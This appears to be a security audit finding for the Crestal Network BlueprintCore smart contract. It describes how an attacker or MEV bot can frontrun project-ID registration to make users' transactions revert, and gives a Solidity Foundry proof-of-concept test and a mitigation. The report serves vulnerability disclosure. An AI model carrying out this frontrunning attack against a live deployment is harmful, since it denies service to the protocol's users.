Best Plastic Yak

Medium

# Attacker will snipe projectIds causing Denial of Service

### Summary

A Malicious actor can snipe a Project Id using any of the functions that directly pass a projectId as a parameter.

### Root Cause

In `BlueprintCore.sol` most functions that create a `projectId` receive a projectId in their parameters and call [setProjectId](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L175). This means that an attacker looking to DoS the protocol can frontrun any of the following calls:
- `createProjectIDAndProposalRequest`
- `createProjectIDAndProposalRequestWithSig`
- `createProjectIDAndDeploymentRequest`
-  `createProjectIDAndDeploymentRequestWithSig`
-  `createProjectIDAndPrivateDeploymentRequest`
-  `createAgentWithToken`
-  `createAgentWithTokenWithSig`
-  `createAgentWithNFT`
-  `createAgentWithWhitelistUsers`
-  `createAgentWithWhitelistUsersWithSig`
-  `createAgentWithSigWithNFT`

Basically any of the public functions that receive a projectId to be created.
And register the same projectId using for example the function `createProjectIDAndProposalRequest` with the same projectId and any data for the other parameters. Due to the newProject modifier the users transaction that was frontran will revert.

### Internal Pre-conditions

1. User calls any public function that receives projectId as a parameter to create projectId.

### External Pre-conditions

None

### Attack Path

1. MEV bot sees the transaction in the mempool
2. MEV bot frontruns trnsaction and registers the projectId
3. User transaction reverts

### Impact

Denial of Service, there is no financial incentive for an attacker to do this, but it wouldn't be an expensive attack either.

### PoC

This test can be included in the BlueprintV5.t.sol test file
```solidity
function test_frontrunProjectId() public {
        address attacker = makeAddr("attacker");
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";
        projectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2981);

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // Mint tokens to the test account
        uint256 validTokenAmount = 100 * 10 ** 18;

        // set none zero cost for create agents, use any number greater than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

        mockToken.mint(address(this), validTokenAmount);

        // Verify the mint
        uint256 balance = mockToken.balanceOf(address(this));
        assertEq(balance, validTokenAmount, "sender does not have the correct token balance");

        // check LogApproveEvent
        vm.expectEmit(true, true, false, true);
        emit MockERC20.LogApproval(address(this), address(blueprint), validTokenAmount);

        // Approve the blueprint contract to spend tokens directly from the test contract
        mockToken.approve(address(blueprint), validTokenAmount);

        // check allowance after approve
        uint256 allowance = mockToken.allowance(address(this), address(blueprint));
        assertEq(allowance, validTokenAmount, "sender does not have the correct token allowance");

        // 1. MEV bot sees the transaction in the mempool
        // 2. MEV bot frontruns trnsaction and registers the projectId
        string memory base64attack = "test test test";
        string memory fakeURL = "http://test.com";
        vm.prank(attacker);
        blueprint.createProjectIDAndProposalRequest(projectId, base64attack, fakeURL);

        // 3. User transaction reverts
        vm.expectRevert();
        blueprint.createAgentWithToken(projectId, base64Proposal, workerAddress, serverURL, address(mockToken));
    }
```

### Mitigation

Use the `createProjectID` method instead of directly using `setProjectId` that way the project Id is created in the same transaction.